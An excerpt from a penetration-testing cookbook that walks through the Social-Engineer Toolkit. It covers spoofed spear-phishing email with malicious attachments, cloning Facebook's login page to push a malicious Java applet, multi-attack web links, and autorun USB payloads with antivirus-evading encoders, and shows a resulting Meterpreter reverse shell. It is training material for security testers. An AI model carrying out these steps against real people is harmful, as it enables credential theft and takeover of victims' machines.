Metasploit Penetration Testing Cookbook, Second Edition — Save 50%
Over 80 recipes to master the most widely used penetration testing framework with this book and ebook
In this article by Monika Agarwal, the author of the book Metasploit Penetration Testing Cookbook Second Edition, we will cover:
- Getting started with the Social-Engineer Toolkit(SET)
- Working with the SET config file
- Working with the spear-phishing attack vector
- Website attack vectors
- Working with the multi-attack web method
- Infectious media generator
(For more resources related to this topic, see here.)
Social engineering is an act of manipulating people to perform actions that they don't intend to do. A cyber-based, socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of confidential information or some malicious activity. The reason for the rapid growth of social engineering amongst hackers is that it is difficult to break the security of a platform, but it is far easier to trick the user of that platform into performing unintentional malicious activity. For example, it is difficult to break the security of Gmail in order to steal someone's password, but it is easy to create a socially engineered scenario where the victim can be tricked to reveal his/her login information by sending a fake login/phishing page.
The Social-Engineer Toolkit is designed to perform such tricking activities. Just like we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans in order to break their own conscious security. It is an official toolkit available at https://www.trustedsec.com/, and it comes as a default installation with BackTrack 5. In this article, we will analyze the aspect of this tool and how it adds more power to the Metasploit framework. We will mainly focus on creating attack vectors and managing the configuration file, which is considered the heart of SET. So, let's dive deeper into the world of social engineering.
Getting started with the Social-Engineer Toolkit (SET)
Let's start our introductory recipe about SET, where we will be discussing SET on different platforms.
SET can be downloaded for different platforms from its official website: https://www.trustedsec.com/. It has both the GUI version, which runs through the browser, and the command-line version, which can be executed from the terminal. It comes pre-installed in BackTrack, which will be our platform for discussion in this article.
How to do it...
To launch SET on BackTrack, start the terminal window and pass the following path:
root@bt:~# cd /pentest/exploits/set root@bt:/pentest/exploits/set# ./set Copyright 2012, The Social-Engineer Toolkit (SET) All rights reserved. Select from the menu:
If you are using SET for the first time, you can update the toolkit to get the latest modules and fix known bugs. To start the updating process, we will pass the svn update command. Once the toolkit is updated, it is ready for use.
The GUI version of SET can be accessed by navigating to Applications | BackTrack | Exploitation tools | Social-Engineer Toolkit.
How it works...
SET is a Python-based automation tool that creates a menu-driven application for us. Faster execution and the versatility of Python make it the preferred language for developing modular tools, such as SET. It also makes it easy to integrate the toolkit with web servers. Any open source HTTP server can be used to access the browser version of SET. Apache is typically considered the preferable server while working with SET.
Sometimes, you may have an issue upgrading to the new release of SET in BackTrack 5 R3. Try out the following steps:
- You should remove the old SET using the following command:
dpkg –r set
We can remove SET in two ways. First, we can trace the path to /pentest/exploits/set, making sure we are in the directory and then opt for the 'rm' command for removing all files present there. Or, we can use the method shown previously.
- Then, for reinstallation, we can download its clone using the following command:
Git clone https://github.com/trustedsec/social-engineer-toolkit /set
Working with the SET config file
In this recipe, we will take a close look at the SET config file, which contains default values for different parameters that are used by the toolkit. The default configuration works fine with most of the attacks, but there can be situations when you have to modify the settings according to the scenario and requirements. So, let's see what configuration settings are available in the config file.
To launch the config file, move to the config file and open the set_config file:
root@bt:/pentest/exploits/set# nano config/set_config
The configuration file will be launched with some introductory statements, as shown in the following screenshot:
How to do it...
Let's go through it step-by-step:
- First, we will see what configuration settings are available for us:
# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3 METASPLOIT_PATH=/pentest/exploits/framework3
The first configuration setting is related to the Metasploit installation directory. Metasploit is required by SET for proper functioning, as it picks up payloads and exploits from the framework:
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT # EXAMPLE: ETTERCAP_INTERFACE=wlan0 ETTERCAP_INTERFACE=eth0 # # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF) ETTERCAP_PATH=/usr/share/ettercap Ettercap is a multipurpose sniffer for switched LAN. Ettercap section can be
used to perform LAN attacks like DNS poisoning, spoofing etc. The above SET
setting can be used to either set ettercap ON of OFF depending upon the
usability. # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES SENDMAIL=OFF
- The sendmail e-mail server is primarily used for e-mail spoofing. This attack will work only if the target's e-mail server does not implement reverse lookup. By default, its value is set to OFF.
The following setting shows one of the most widely used attack vectors of SET. This configuration will allow you to sign a malicious Java applet with your name or with any fake name, and then it can be used to perform a browser-based Java applet infection attack:
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO # INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install
We will discuss this attack vector in detail in a later recipe, that is, the Spear phishing attack vector . This attack vector will also require JDK to be installed on your system. Let's set its value to ON, as we will be discussing this attack in detail:
SELF_SIGNED_APPLET=ON # AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF
YOU WANT # SET TO AUTODETECT YOUR INTERFACE AUTO_DETECT=ON
- The AUTO_DETECT flag is used by SET to auto-discover the network settings. It will enable SET to detect your IP address if you are using NAT/Port forwarding, and it allows you to connect to the external Internet.
The following setting is used to set up the Apache web server to perform web-based attack vectors. It is always preferred to set it to ON for better attack performance:
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF # THE ATTACK VECTOR APACHE_SERVER=OFF # # PATH TO THE APACHE WEBROOT APACHE_DIRECTORY=/var/www
- The following setting is used to set up the SSL certificate while performing web attacks. Several bugs and issues have been reported for the WEBATTACK_SSL setting of SET. So, it is recommended to keep this flag OFF:
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH
WEB_ATTACK VECTOR WEBATTACK_SSL=OFF
- The following setting can be used to build a self-signed certificate for web attacks, but there will be a warning message saying Untrusted certificate. Hence, it is recommended to use this option wisely to avoid alerting the target user:
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE
WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! # SELF_SIGNED_CERT=OFF
- The following setting is used to enable or disable the Metasploit listener once the attack is executed:
# DISABLES AUTOMATIC LISTENER - TURN THIS OFF IF YOU DON'T WANT A
METASPLOIT LISTENER IN THE BACKGROUND. AUTOMATIC_LISTENER=ON
- The following configuration will allow you to use SET as a standalone toolkit without using Metasploit functionalities, but it is always recommended to use Metasploit along with SET in order to increase the penetration testing performance:
# THIS WILL DISABLE THE FUNCTIONALITY IF METASPLOIT IS NOT INSTALLED AND
YOU JUST WANT TO USE SETOOLKIT OR RATTE FOR PAYLOADS # OR THE OTHER ATTACK VECTORS. METASPLOIT_MODE=ON
These are a few important configuration settings available for SET. Proper knowledge of the config file is essential to gain full control over the SET.
How it works...
The SET config file is the heart of the toolkit, as it contains the default values that SET will pick while performing various attack vectors. A misconfigured SET file can lead to errors during the operation, so it is essential to understand the details defined in the config file in order to get the best results. The How to do it... section clearly reflects the ease with which we can understand and manage the config file.
Working with the spear-phishing attack vector
A spear-phishing attack vector is an e-mail attack scenario that is used to send malicious mails to target/specific user(s). In order to spoof your own e-mail address, you will require a sendmail server. Change the config setting to SENDMAIL=ON. If you do not have sendmail installed on your machine, then it can be downloaded by entering the following command:
root@bt:~# apt-get install sendmail Reading package lists... Done
Before we move ahead with a phishing attack, it is imperative for us to know how the e-mail system works.
Recipient e-mail servers, in order to mitigate these types of attacks, deploy gray-listing, SPF records validation, RBL verification, and content verification. These verification processes ensure that a particular e-mail arrived from the same e-mail server as its domain. For example, if a spoofed e-mail address, <email@example.com>, arrives from the IP 18.104.22.168, it will be marked as malicious, as this IP address does not belong to Gmail. Hence, in order to bypass these security measures, the attacker should ensure that the server IP is not present in the RBL/SURL list. As the spear-phishing attack relies heavily on user perception, the attacker should conduct a recon of the content that is being sent and should ensure that the content looks as legitimate as possible.
Spear-phishing attacks are of two types—web-based content and payload-based content.
How to do it...
The spear-phishing module has three different attack vectors at our disposal:
Let's analyze each of them.
Passing the first option will start our mass-mailing attack. The attack vector starts with selecting a payload. You can select any vulnerability from the list of available Metasploit exploit modules. Then, we will be prompted to select a handler that can connect back to the attacker. The options will include setting the vnc server or executing the payload and starting the command line, and so on.
The next few steps will be starting the sendmail server, setting a template for a malicious file format, and selecting a single or mass-mail attack:
Finally, you will be prompted to either choose a known mail service, such as Gmail or Yahoo, or use your own server:
1. Use a gmail Account for your email attack. 2. Use your own server or open relay set:phishing>1 set:phishing> From address (ex: firstname.lastname@example.org):email@example.com set:phishing> Flag this message/s as high priority? [yes|no]:y
Setting up your own server cannot be very reliable, as most of the mail services follow a reverse lookup to make sure that the e-mail has generated from the same domain name as the address name.
Let's analyze another attack vector of spear-fishing. Creating a file format payload is another attack vector in which we can generate a file format with a known vulnerability and send it via e-mail to attack our target. It is preferred to use MS Word-based vulnerabilities, as they are difficult to detect whether they are malicious or not, so they can be sent as an attachment via an e-mail:
set:phishing> Setup a listener [yes|no]:y [-] *** [-] * WARNING: Database support has been disabled [-] ***
At last, we will be prompted on whether we want to set up a listener or not. The Metasploit listener will begin and we will wait for the user to open the malicious file and connect back to the attacking system.
The success of e-mail attacks depends on the e-mail client that we are targeting. So, a proper analysis of this attack vector is essential.
How it works...
As discussed earlier, the spear-phishing attack vector is a social engineering attack vector that targets specific users. An e-mail is sent from the attacking machine to the target user(s). The e-mail will contain a malicious attachment, which will exploit a known vulnerability on the target machine and provide a shell connectivity to the attacker. The SET automates the entire process. The major role that social engineering plays here is setting up a scenario that looks completely legitimate to the target, fooling the target into downloading the malicious file and executing it.
eBook Price: $29.99
Book Price: $49.99
Website attack vectors
The SET web attack vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. It is, by far, the most popular attack vector of the SET. It works similar to the browser, autopwn, where several (or specific) attacks can be sent to the target browser. It has the following attack vectors:
Here, in this recipe, we will discuss the most popular attack vector, the Java applet attack method. Let's see how this attack is performed using SET.
To start with the Java applet attack method, we will have to select the first option. Then, in the next step, we will be prompted to choose a webpage setup. We can either choose custom templates or clone a complete URL. Let's see how cloning will help us in performing the attack:
How to do it...
The target user will have to access the website that the pentester has decided to clone. Hence, the pentester should understand that the cloned site shouldn't digress from the actual site's functionality, that is, the phishing site.
- To start with the cloning option, we will have to decide on a URL we want to clone. Let's clone the Facebook login page and proceed further:
1. Web Templates 2. Site Cloner 3. Custom Import 4. Return to the main menu Enter number (1-4): 2 SET supports both HTTP and HTTPS Example: http://www.thisisafakesite.com Enter the url to clone: http://www.facebook.com [*] Cloning the website: https://login.facebook.com/login.php [*] This could take a little bit...
- Once we are done with the cloning part, we will be prompted to choose a payload along with a backdoor that can be dropped onto the target machine.
- Once we're done with these steps, the SET web server will start along with MSF. MSF will manage the handler that will receive the back connection once the payload is dropped onto the target machine.
- You can find your cloned template along with the jar at /pentest/exploits/set/src/web_clone/site/template. Now, once the target user visits the cloned website (hosted on a fake domain), an applet message will pop up that will appear as a completely safe alert message:
- Now, once the target user clicks on Allow, the malicious applet gets executed and it allows the execution of the payload. The Metasploit listener will receive a connection back from the target machine and thus, we will have an active session:
[*] Sending stage (748544 bytes) to 192.168.56.103 [*] Meterpreter session 1 opened (192.168.56.103:443 -> Thu Sep 09 10:06:57 -0400 2010 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > shell Process 2988 created. Channel 1 created. Microsoft Windows XP [Version 6.1] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Administrator\Desktop>
Similarly, we can perform other attacks as well. You can see how easily SET creates attack vectors for us and provides us with complete control over our scenario. The best thing about SET is that it can give you the full opportunity to implement your own modifications and changes whenever you want.
How it works...
The Java applet infection is a popular Java applet vulnerability that allows the execution of the applet outside the protected sandbox environment. Unsigned, or unsafe, applets are executed in a sandbox environment with limited access to system resources. Once the malicious applet is allowed to execute after the warning message, it gains the privilege of full resource access on the target machine, as it is now outside the sandbox environment. This allows the applet to execute Java vulnerability and allow remote code execution. Similarly, other web-based attack vectors use a browser to transfer attacks to the target system. Social engineering again lies in the art of crafting a scenario which fools the user. The attacker can create a malicious link hidden under a href tag, or the applet can be signed using fake signatures in order to make it look completely legitimate. SET templates are a good source of designing attacks.
Working with the multi-attack web method
The multi-attack web method further takes web attack to the next level by combining several attacks into one. This attack method allows us to club several exploits and vulnerabilities under a single format. Once the file or URL is opened by the target user, then each attack is thrown one by one, unless a successful attack is reported. SET automates the process of clubbing different attacks under a single web attack scenario. Let us move ahead and see how this is done.
How to do it...
The multi-attack web method begins similar to other web-based attacks. We start with selecting a template which can either be imported or cloned. The difference lies in the next step, where we can select various exploits that can be added into the web attack:
Select which attacks you want to use: 1. The Java Applet Attack Method (OFF) 2. The Metasploit Browser Exploit Method (OFF) 3. Credential Harvester Attack Method (OFF) 4. Tabnabbing Attack Method (OFF) 5. Man Left in the Middle Attack Method (OFF) 6. Web Jacking Attack Method (OFF) 7. Use them all - A.K.A. 'Tactical Nuke' 8. I'm finished and want proceed with the attack. 9. Return to main menu. Enter your choice one at a time (hit 8 when finished selecting):
We can select different attacks, and once we are done, we can pass 8 and finally combine the selected attacks under a single vector. Finally, we will be prompted to select a payload and backdoor encoder.
How it works...
Once different attacks have been selected, SET clubs them with a payload and builds a single malicious link that now needs to be socially engineered. We will have to build a template that looks completely legitimate to the target user and force him or her to visit the malicious link. Once the link is clicked by the victim, different attacks are tried one by one unless a successful attack is launched. Once a vulnerability is found and exploited, the payload provides a back connectivity to the Metasploit listener.
Infectious media generator
The infectious media generator is a relatively simple attack vector. SET will create a Metasploit-based payload, set up a listener for you, and generate a folder that needs to be burned or written to a DVD/USB drive. Once inserted, if auto-run is enabled, the code will automatically execute and take control of the machine.
How to do it...
This attack vector is based on a simple principle of generating a malicious executable, and then encoding it with available encoders, so as to bypass antivirus protection. The following are some examples of infectious media generators with their description as well:
1. Windows Shell Reverse_TCP victim and send back to attacker.
Spawn a command shell on
2. Windows Reverse_TCP Meterpreter victim and send back to attacker.
Spawn a meterpreter shell on
3. Windows Reverse_TCP VNC DLL and send back to attacker.
Spawn a VNC server on victim
4. Windows Bind Shell accepting port on remote system.
Execute payload and create an
5. Windows Bind Shell X64 Bind TCP Inline
Windows x64 Command Shell,
6. Windows Shell Reverse_TCP X64 Reverse TCP Inline
Windows X64 Command Shell,
7. Windows Meterpreter Reverse_TCP
X64 (Windows x64), Meterpreter
Connect back to the attacker
8. Windows Meterpreter Egress Buster find a port home via multiple ports
Spawn a meterpreter shell and
9. Import your own executable executable
Specify a path for your own
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)
Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few
[-] Backdoor completed successfully. Payload is now hidden within a legit
[*] Your attack has been created in the SET home directory folder
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.
[*] The payload can be found in the SET home directory.
[*] Do you want to start the listener now? yes or no: yes
[*] Please wait while the Metasploit listener is loaded...
How it works...
After generating the encoded malicious file, the Metasploit listener starts waiting for back connections. The only limitation with this attack is that the removable media must have auto-run enabled; otherwise, it will require a manual trigger.
This type of attack vector can be helpful in situations where the target user is behind a firewall. Most of the antivirus programs now-a-days, disable auto-run, which in turn renders this type of attack useless. The pentester along with autorun-based attacks, should also ensure that a backdoor legitimate executable/PDF is provided along with the media. This would ensure that the victim would invariably execute one of the payloads.
Social-Engineer Toolkit, explains about social engineering, which is an act of manipulating people to perform actions that they don't intend to do. A cyber-based socially engineered scenario is designed to trap a user into performing activities that can lead to the theft of con?dential information or some malicious activity. Just like we have exploits and vulnerabilities for existing software and operating systems, SET is a generic exploit of humans in order to break their own conscious security.
Resources for Article:
- So, what is Metasploit? [Article]
- Planning the lab environment [Article]
- BackTrack 4: Target Scoping [Article]
eBook Price: $29.99
Book Price: $49.99
About the Author :
Monika Agarwal is a young Information Security Researcher from India. She has presented many research papers at both national and international conferences. She is a member of IAENG (International Association of Engineers). Her main areas of interest are ethical hacking and ad hoc networking.